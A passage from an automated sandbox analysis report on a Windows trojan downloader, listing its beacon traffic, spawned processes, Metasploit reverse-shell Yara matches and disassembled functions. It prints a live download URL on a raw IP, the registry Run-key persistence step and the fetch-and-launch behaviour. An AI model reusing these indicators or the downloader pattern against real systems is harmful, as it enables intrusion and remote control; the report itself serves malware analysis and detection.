2024-09-28 15:52:55 UTC	271	OUT	POST / HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: / User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Content-Length: 243 Host: 84.201.150.223
2024-09-28 15:52:55 UTC	243	OUT	Data Raw: 00 00 00 ef de ad be ef 3c f2 86 5e 00 00 00 63 00 00 00 00 9c 78 0c 3e e0 d2 8e 0e 02 80 be 12 34 f2 ba 86 7c dc 8e 12 c8 06 f4 b0 78 80 fa 34 30 ec 9e b4 ea ca 98 0a 1a 42 90 98 14 12 44 00 4e 0e a2 8e df d0 64 43 c0 2f cf 5b cd 07 31 dc fe ff ae 79 50 99 ac 63 37 db d5 69 60 5e fb 89 93 f5 c1 38 a2 f9 ac b4 2a f3 57 ed f1 17 fb 8b 63 4f eb c4 b7 ee 57 64 30 d9 ff de c7 89 24 ca dc f1 14 f5 d4 20 b9 ee 13 c9 40 91 0c 9b ed 4a 8b 0f 3a 5e 22 1c b6 66 f2 1a bc 4d 9d b8 c8 57 db 71 9e 9a a3 b9 48 8f dc af 24 fc 6c a6 53 ec 7e 70 0e 9f 71 b0 98 eb 39 25 ab ff 72 5f ad 81 83 14 93 95 f9 14 00 35 c6 c2 3c 35 d6 23 c9 e0 a5 37 f0 fb 7d 07 49 cd de d9 36 f3 d5 45 25 3f a3 d0 ab 96 f7 ad 47 4c b8 68 85 f3 47 fa be 90 1c aa 9f Data Ascii: <^cx>4\|x40BDNdC/[1yPc7i`^8*WcOWd0$ @J:^"fMWqH$lS~pq9%r_5<5#7}I6E%?GLhG

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	63065	84.201.150.223	443	2196	C:\ProgramData\sh-runner.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-28 15:53:03 UTC	271	OUT	POST / HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: / User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Content-Length: 243 Host: 84.201.150.223
2024-09-28 15:53:03 UTC	243	OUT	Data Raw: 00 00 00 ef de ad be ef 2c d8 bf fa 00 00 00 63 00 00 00 00 a8 1e b0 56 04 f4 40 d0 1e 46 dc f8 da 86 86 1c 44 d6 12 2a 58 2a 08 50 a6 74 42 b8 60 b6 46 62 24 a0 ba b0 c6 66 24 1e b0 a0 dc c0 06 d4 3c 06 7a 7c 55 fe c9 9f 58 96 60 e8 af 81 c8 d4 8c fb 31 de ed 8f f3 73 77 63 56 15 41 d0 f1 ee bf b8 b3 e1 1b 07 be 57 db f6 5a 47 a9 f4 40 f6 b1 b8 2d 30 74 87 b9 b0 3b cf 47 97 76 aa da 59 ba 0a 08 cf 10 8d fb c7 fb 94 fe c5 d7 ac e7 2e 73 bf 04 c4 a0 a2 5e 71 1e 8e a2 1c b2 11 36 e8 cb 30 e7 2c cf dc 2e 3e f3 d8 33 79 67 fd 72 6d c2 16 2a 1c 2b 66 4f f5 95 b9 33 03 f8 e1 6c 17 05 86 2c ea 51 24 df 97 65 38 68 82 78 2d dc fe a3 5e 82 cc ed 16 13 7d 48 37 02 fa c7 c7 58 7f a5 f8 81 86 cd 2d a3 3f cc 13 69 30 bb a6 4c a9 8a Data Ascii: ,cV@FDXPtB`Fb$f$<z\|UX`1swcVAWZG@-0t;GvY.s^q60,.>3ygrm*+fO3l,Q$e8hx-^}H7X-?i0L

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	63066	84.201.150.223	443	5472	C:\ProgramData\sh-runner.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-28 15:53:11 UTC	271	OUT	POST / HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: / User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Content-Length: 243 Host: 84.201.150.223
2024-09-28 15:53:11 UTC	243	OUT	Data Raw: 00 00 00 ef de ad be ef 34 ad 5b d0 00 00 00 63 00 00 00 00 b6 9a 6e 04 78 18 1c 3e f2 32 bc 10 c4 74 d6 04 50 8c c0 30 06 aa 8e 42 52 ba be 50 bc 08 b0 22 d2 54 ce 22 88 8e 8c cc 98 6a 28 14 74 fe f8 d8 1d 08 de 55 0e 8d ad 40 c9 52 1b ba 57 c6 34 ee 2a c0 7a 75 95 5f 0f f4 b8 64 56 91 1c 44 27 5e a4 dc a5 6b 14 d2 af c0 5f f0 7c ef dc ca a6 ef 39 fe 3f ca 1c 29 ab 22 5f 72 a5 11 4b 5e f6 1b b0 9d 5c 50 1b ab 3e 36 73 69 25 21 be 8a 24 5d 2a 79 cd d3 29 aa 7d fc 87 3b 6e 02 1a b1 c7 55 12 c9 2a 97 34 c6 ff 70 c9 2a 0f ac 48 20 e7 7d b1 47 63 f0 c0 dd ee ab 47 74 51 ce e2 04 8a 35 c3 e7 9d 8c 29 e7 ad f2 1d 55 4c 01 0d bb 88 29 b1 fc a3 ed b3 73 d7 0c 8c 20 db d8 59 eb d3 68 1c 33 ba 54 cf 37 35 61 68 1e f1 83 c6 3d 8b Data Ascii: 4[cnx>2tP0BRP"T"j(tU@RW4zu_dVD'^k_\|9?)"_rK^\P>6si%!$]y)};nU4pH }GcGtQ5)UL)s Yh3T75ah=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	63067	84.201.150.223	443	3096	C:\ProgramData\sh-runner.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-28 15:53:32 UTC	271	OUT	POST / HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: / User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Content-Length: 243 Host: 84.201.150.223
2024-09-28 15:53:32 UTC	243	OUT	Data Raw: 00 00 00 ef de ad be ef 3c f2 86 5e 00 00 00 63 00 00 00 00 9c 78 0c 3e e0 d2 8e 0e 02 80 be 12 34 f2 ba 86 7c dc 8e 12 c8 06 f4 b0 78 80 fa 34 30 ec 9e b4 ea ca 98 0a 1a 42 90 98 14 12 44 00 4e 0e a2 8e 91 55 7b 2f 9c 23 c5 67 89 c8 23 72 1f 0e 24 ad 07 fe fd 41 17 fb 13 30 54 8d 7a b2 f6 1a 78 ad 11 d8 74 b3 d9 dd c2 ff aa c9 0a 6f b2 ad 33 c7 b9 86 3c 08 c6 a8 3e 5b 2a 44 2d 92 67 79 da ad 1b c2 61 8c ae df db cd 49 28 9c 32 8b 24 de b8 e2 ea a3 23 f2 a5 84 0b e6 09 9f c6 78 e7 48 b9 11 ff d1 7b 2f 6e 3f 5c 86 63 e7 88 3f 5b ad b8 9d 37 41 3a ec e2 66 42 df af 65 84 4b 83 ee 95 38 5b d1 b2 14 23 c5 b6 84 93 66 15 7a ce 3c db 24 67 c5 80 87 ec f4 ba 1c e5 62 62 94 7e 11 28 29 22 5b d7 7d 98 1c 64 43 20 37 62 13 da 20 Data Ascii: <^cx>4\|x40BDNU{/#g#r$A0Tzxto3<>[*D-gyaI(2$#xH{/n?\c?[7A:fBeK8[#fz<$gbb~()"[}dC 7b

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	63068	84.201.150.223	443	2196	C:\ProgramData\sh-runner.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-28 15:53:39 UTC	271	OUT	POST / HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: / User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Content-Length: 243 Host: 84.201.150.223
2024-09-28 15:53:39 UTC	243	OUT	Data Raw: 00 00 00 ef de ad be ef 2c d8 bf fa 00 00 00 63 00 00 00 00 a8 1e b0 56 04 f4 40 d0 1e 46 dc f8 da 86 86 1c 44 d6 12 2a 58 2a 08 50 a6 74 42 b8 60 b6 46 62 24 a0 ba b0 c6 66 24 1e b0 a0 dc c0 06 d4 3c 06 5a c0 dd 32 8b 3f 5f 42 3c a3 98 27 d3 48 54 a4 e8 09 84 63 e3 fd cf 7f 3e 86 ec 8f 74 be 75 70 72 32 21 6e 43 71 bc dc 38 46 8b c9 e1 6e 6f 1a 9d 9c 1f 99 a7 bb 6a ba 66 b2 d2 3f f4 0d ae 6c a0 d3 8d 03 f4 9b 92 6b 43 ae 6d fe f2 17 c4 db 81 a1 cf c9 3a 9a 5d 1c 46 98 26 08 98 60 7e 9e c8 9d 16 5c b7 09 37 b2 e6 71 b8 23 f1 8c 9d 8f b4 e0 43 ff 24 5b c9 5f 11 dc ec cb 10 46 51 68 5b e3 76 f3 ff 75 1e f0 b9 77 02 47 77 d2 b7 02 91 35 70 cd 72 f4 ce 60 b7 08 fc a3 e5 66 b9 de e7 5a 0b 7d 66 64 ef c3 07 2f cf f4 a4 56 76 Data Ascii: ,cV@FDXPtB`Fb$f$<Z2?_B<'HTc>tupr2!nCq8Fnojf?lkCm:]F&`~\7q#C$[_FQh[vuwGw5pr`fZ}fd/Vv

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	63069	84.201.150.223	443	5472	C:\ProgramData\sh-runner.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-28 15:53:46 UTC	271	OUT	POST / HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: / User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Content-Length: 243 Host: 84.201.150.223
2024-09-28 15:53:46 UTC	243	OUT	Data Raw: 00 00 00 ef de ad be ef 34 ad 5b d0 00 00 00 63 00 00 00 00 b6 9a 6e 04 78 18 1c 3e f2 32 bc 10 c4 74 d6 04 50 8c c0 30 06 aa 8e 42 52 ba be 50 bc 08 b0 22 d2 54 ce 22 88 8e 8c cc 98 6a 28 14 74 fe f8 d8 56 e0 29 21 6c a7 b8 b8 d3 81 21 57 ed 65 c1 90 4d 14 b5 c0 e3 0b 2d c4 49 eb 42 e1 11 e0 e6 f3 c9 6b 26 b7 f9 09 ad 33 20 55 d3 ff 07 2d ef 25 29 17 0b fc 17 85 0b 4e 04 c2 70 8b 72 8a 54 85 24 20 6e cf 66 45 30 f7 43 d2 af 09 69 f6 6d 1a 85 36 30 ee 70 42 0b 66 5d f1 ab a7 1d 15 b8 ca ee 22 f1 1c 54 2d 78 ac e9 e1 5e dc fc cd 90 40 c2 23 d5 76 3e a5 c0 eb 29 1c fe 15 39 10 19 5e 1f e8 42 01 fa 43 fc 4a af 9c 98 e1 24 be 4c 9e fd b8 ae 9a fd 89 f3 b3 a2 af 08 1d 1d a8 e3 9c 9b 26 73 39 0a 49 ad fd f4 c6 2c 8e 87 ac 9e Data Ascii: 4[cnx>2tP0BRP"T"j(tV)!l!WeM-IBk&3 U-%)NprT$ nfE0Cim60pBf]"T-x^@#v>)9^BCJ$L&s9I,

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	63070	84.201.150.223	443	3096	C:\ProgramData\sh-runner.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-28 15:54:07 UTC	271	OUT	POST / HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: / User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Content-Length: 243 Host: 84.201.150.223
2024-09-28 15:54:07 UTC	243	OUT	Data Raw: 00 00 00 ef de ad be ef 3c f2 86 5e 00 00 00 63 00 00 00 00 9c 78 0c 3e e0 d2 8e 0e 02 80 be 12 34 f2 ba 86 7c dc 8e 12 c8 06 f4 b0 78 80 fa 34 30 ec 9e b4 ea ca 98 0a 1a 42 90 98 14 12 44 00 4e 0e a2 8e df d0 64 43 c0 2f cf 5b cd 07 31 dc fe ff ae 79 50 99 ac 63 37 db d5 69 60 5e fb 89 93 f5 c1 38 a2 f9 ac b4 2a f3 57 ed f1 17 fb 8b 63 4f eb c4 b7 ee 57 64 30 d9 ff de c7 89 24 ca dc f1 14 f5 d4 20 b9 ee 13 c9 40 91 0c 9b ed 4a 8b 0f 3a 5e 22 1c b6 66 f2 1a bc 4d 9d b8 c8 57 db 71 9e 9a a3 b9 48 8f dc af 24 fc 6c a6 53 ec 7e 70 0e 9f 71 b0 98 eb 39 25 ab ff 72 5f ad 81 83 14 93 95 f9 14 00 35 c6 c2 3c 35 d6 23 c9 e0 a5 37 f0 fb 7d 07 49 cd de d9 36 f3 d5 45 25 3f a3 d0 ab 96 f7 ad 47 4c b8 68 85 f3 47 fa be 90 1c aa 9f Data Ascii: <^cx>4\|x40BDNdC/[1yPc7i`^8*WcOWd0$ @J:^"fMWqH$lS~pq9%r_5<5#7}I6E%?GLhG

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	63071	84.201.150.223	443	2196	C:\ProgramData\sh-runner.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-28 15:54:15 UTC	271	OUT	POST / HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: / User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Content-Length: 243 Host: 84.201.150.223
2024-09-28 15:54:15 UTC	243	OUT	Data Raw: 00 00 00 ef de ad be ef 2c d8 bf fa 00 00 00 63 00 00 00 00 a8 1e b0 56 04 f4 40 d0 1e 46 dc f8 da 86 86 1c 44 d6 12 2a 58 2a 08 50 a6 74 42 b8 60 b6 46 62 24 a0 ba b0 c6 66 24 1e b0 a0 dc c0 06 d4 3c 06 7a 7c 55 fe c9 9f 58 96 60 e8 af 81 c8 d4 8c fb 31 de ed 8f f3 73 77 63 56 15 41 d0 f1 ee bf b8 b3 e1 1b 07 be 57 db f6 5a 47 a9 f4 40 f6 b1 b8 2d 30 74 87 b9 b0 3b cf 47 97 76 aa da 59 ba 0a 08 cf 10 8d fb c7 fb 94 fe c5 d7 ac e7 2e 73 bf 04 c4 a0 a2 5e 71 1e 8e a2 1c b2 11 36 e8 cb 30 e7 2c cf dc 2e 3e f3 d8 33 79 67 fd 72 6d c2 16 2a 1c 2b 66 4f f5 95 b9 33 03 f8 e1 6c 17 05 86 2c ea 51 24 df 97 65 38 68 82 78 2d dc fe a3 5e 82 cc ed 16 13 7d 48 37 02 fa c7 c7 58 7f a5 f8 81 86 cd 2d a3 3f cc 13 69 30 bb a6 4c a9 8a Data Ascii: ,cV@FDXPtB`Fb$f$<z\|UX`1swcVAWZG@-0t;GvY.s^q60,.>3ygrm*+fO3l,Q$e8hx-^}H7X-?i0L

Target ID:	0
Start time:	11:52:11
Start date:	28/09/2024
Path:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe"
Imagebase:	0x7ff71c8c0000
File size:	250'094 bytes
MD5 hash:	CCF3C480F27DB238FA757D0967241817
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	11:52:11
Start date:	28/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	11:52:13
Start date:	28/09/2024
Path:	C:\ProgramData\sh-runner.exe
Wow64 process (32bit):	false
Commandline:	"C:\ProgramData\sh-runner.exe"
Imagebase:	0x7ff72bcd0000
File size:	1'169'665 bytes
MD5 hash:	D178CD15E8E69662A943BF0A9DA7FF60
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000002.00000002.3055198846.000001FF22F90000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Metasploit_0f5a852d, Description: Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families., Source: 00000002.00000002.3055198846.000001FF22F90000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000002.00000002.3055198846.000001FF22F90000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 39%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	11:52:13
Start date:	28/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	11:52:24
Start date:	28/09/2024
Path:	C:\ProgramData\sh-runner.exe
Wow64 process (32bit):	false
Commandline:	"C:\ProgramData\sh-runner.exe"
Imagebase:	0x7ff72bcd0000
File size:	1'169'665 bytes
MD5 hash:	D178CD15E8E69662A943BF0A9DA7FF60
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000004.00000002.3055112919.00000112CF4C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Metasploit_0f5a852d, Description: Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families., Source: 00000004.00000002.3055112919.00000112CF4C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000004.00000002.3055112919.00000112CF4C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	11:52:24
Start date:	28/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	11:52:32
Start date:	28/09/2024
Path:	C:\ProgramData\sh-runner.exe
Wow64 process (32bit):	false
Commandline:	"C:\ProgramData\sh-runner.exe"
Imagebase:	0x7ff72bcd0000
File size:	1'169'665 bytes
MD5 hash:	D178CD15E8E69662A943BF0A9DA7FF60
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000009.00000002.3055111517.00000184BE2A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Metasploit_0f5a852d, Description: Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families., Source: 00000009.00000002.3055111517.00000184BE2A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000009.00000002.3055111517.00000184BE2A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	11:52:32
Start date:	28/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exePID: 7128, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	5.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	11.9%
Total number of Nodes:	612
Total number of Limit Nodes:	10

Executed Functions

Function 00007FF71C8C1450 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 125
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenA.WININET ref: 00007FF71C8C14B7
InternetOpenUrlA.WININET ref: 00007FF71C8C1523

Strings

Failed to create file. Error: %ld, xrefs: 00007FF71C8C159F
InternetOpenUrl failed. Error: %ld, xrefs: 00007FF71C8C1541
Starting download from: %s, xrefs: 00007FF71C8C147E
Downloader, xrefs: 00007FF71C8C14A6
InternetOpen failed. Error: %ld, xrefs: 00007FF71C8C14D5
File downloaded to: %s, xrefs: 00007FF71C8C167F

Memory Dump Source

Source File: 00000000.00000002.1817202590.00007FF71C8C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C8C0000, based on PE: true

Associated: 00000000.00000002.1817161086.00007FF71C8C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817252100.00007FF71C8CA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817264618.00007FF71C8CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817279257.00007FF71C8D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817279257.00007FF71C8E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71c8c0000_SecuriteInfo.jbxd

Similarity

API ID: InternetOpen
String ID: Downloader$Failed to create file. Error: %ld$File downloaded to: %s$InternetOpen failed. Error: %ld$InternetOpenUrl failed. Error: %ld$Starting download from: %s
API String ID: 2038078732-3706866148
Opcode ID: c9da2b257414b64ef9cf78d9f389ab95daf9465a16b9b81184522febe6ca77d9
Instruction ID: 23d7c0dbec720a836331e968d1d9930a5754b94fd6e1db08cb1b8c22a7e8503c
Opcode Fuzzy Hash: c9da2b257414b64ef9cf78d9f389ab95daf9465a16b9b81184522febe6ca77d9
Instruction Fuzzy Hash: A2513121B25F4788EB70EBA5E8D07F9A360EB447E8FA40036DD0D47BA4DE2DD6598314

Function 00007FF71C8C1180 Relevance: 10.6, APIs: 7, Instructions: 146
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(?,?,?,00007FF71C8C1406), ref: 00007FF71C8C11BE
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF71C8C122F
malloc.MSVCRT ref: 00007FF71C8C1263
strlen.MSVCRT ref: 00007FF71C8C1284
malloc.MSVCRT ref: 00007FF71C8C1290
memcpy.MSVCRT ref: 00007FF71C8C12A8

Memory Dump Source

Source File: 00000000.00000002.1817202590.00007FF71C8C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C8C0000, based on PE: true

Associated: 00000000.00000002.1817161086.00007FF71C8C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817252100.00007FF71C8CA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817264618.00007FF71C8CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817279257.00007FF71C8D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817279257.00007FF71C8E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71c8c0000_SecuriteInfo.jbxd

Similarity

API ID: malloc$ExceptionFilterSleepUnhandledmemcpystrlen
String ID:
API String ID: 3806033187-0
Opcode ID: 00cd5bc779e85805f5c7e24dd35275362a4537a0d72859afc22e7dbc697c536f
Instruction ID: b01762e26ba4e1e277728891a2677b314a1b5e19ba6e63538ab04e9cfb7b24a9
Opcode Fuzzy Hash: 00cd5bc779e85805f5c7e24dd35275362a4537a0d72859afc22e7dbc697c536f
Instruction Fuzzy Hash: BB512635A2AF0285F710BFD5E8C12F9E2A1AF44BA4FA44036D91C47791DE2CF4698328

Function 00007FF71C8C169C Relevance: 31.6, APIs: 6, Strings: 12, Instructions: 116
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

strlen.MSVCRT ref: 00007FF71C8C16EE

Part of subcall function 00007FF71C8C1450: InternetOpenA.WININET ref: 00007FF71C8C14B7

RegOpenKeyA.ADVAPI32 ref: 00007FF71C8C1790
strlen.MSVCRT ref: 00007FF71C8C17A6
RegSetValueExA.KERNELBASE ref: 00007FF71C8C17DC
RegCloseKey.KERNELBASE ref: 00007FF71C8C17EC
ShellExecuteA.SHELL32 ref: 00007FF71C8C1847

Strings

Added to startup., xrefs: 00007FF71C8C17EE
Launching file: %s, xrefs: 00007FF71C8C1804
Saving file to: %s, xrefs: 00007FF71C8C171F
Failed to download file., xrefs: 00007FF71C8C174A
Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00007FF71C8C1778
ner.exe, xrefs: 00007FF71C8C170A
\sh-runn, xrefs: 00007FF71C8C16FD
open, xrefs: 00007FF71C8C1831
http://84.201.150.223/sh-runner.exe, xrefs: 00007FF71C8C16B1
Failed to open registry. Error: %ld, xrefs: 00007FF71C8C186A
Failed to launch file. Error: %ld, xrefs: 00007FF71C8C188B
MyProgram, xrefs: 00007FF71C8C1763

Memory Dump Source

Source File: 00000000.00000002.1817202590.00007FF71C8C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C8C0000, based on PE: true

Associated: 00000000.00000002.1817161086.00007FF71C8C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817252100.00007FF71C8CA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817264618.00007FF71C8CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817279257.00007FF71C8D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817279257.00007FF71C8E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71c8c0000_SecuriteInfo.jbxd

Similarity

API ID: Openstrlen$CloseExecuteInternetShellValue
String ID: Added to startup.$Failed to download file.$Failed to launch file. Error: %ld$Failed to open registry. Error: %ld$Launching file: %s$MyProgram$Saving file to: %s$Software\Microsoft\Windows\CurrentVersion\Run$\sh-runn$http://84.201.150.223/sh-runner.exe$ner.exe$open
API String ID: 3194364268-3409995752
Opcode ID: a2ae2c9ca35328b334f6838570fb28f5b9dd242b2fe4c4d74bd9b39881edcf40
Instruction ID: ed83692744cd52eed9a952dfa85be6d6623ff1a2ecaf33ef506e789a714eef10
Opcode Fuzzy Hash: a2ae2c9ca35328b334f6838570fb28f5b9dd242b2fe4c4d74bd9b39881edcf40
Instruction Fuzzy Hash: F4513121B29F0189EB10EBE1E8D03EAA365AF447A4FA0413ADD0D477A5EE2DD559C314

Function 00007FF71C8C2CC0 Relevance: 3.1, APIs: 2, Instructions: 99
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

fputc.MSVCRT ref: 00007FF71C8C2D45
fputc.MSVCRT ref: 00007FF71C8C2D8B

Memory Dump Source

Source File: 00000000.00000002.1817202590.00007FF71C8C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C8C0000, based on PE: true

Associated: 00000000.00000002.1817161086.00007FF71C8C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817252100.00007FF71C8CA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817264618.00007FF71C8CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817279257.00007FF71C8D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817279257.00007FF71C8E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71c8c0000_SecuriteInfo.jbxd

Similarity

API ID: fputc
String ID:
API String ID: 1992160199-0
Opcode ID: 4538d32ceec3dca7f12e159fcdf27e8c1efa2a33f683ce578554921e2bd15e56
Instruction ID: 5e0f70baf71ee82e620931ad212d1e515e0406fcf34c713c8c916fbed1e9926b
Opcode Fuzzy Hash: 4538d32ceec3dca7f12e159fcdf27e8c1efa2a33f683ce578554921e2bd15e56
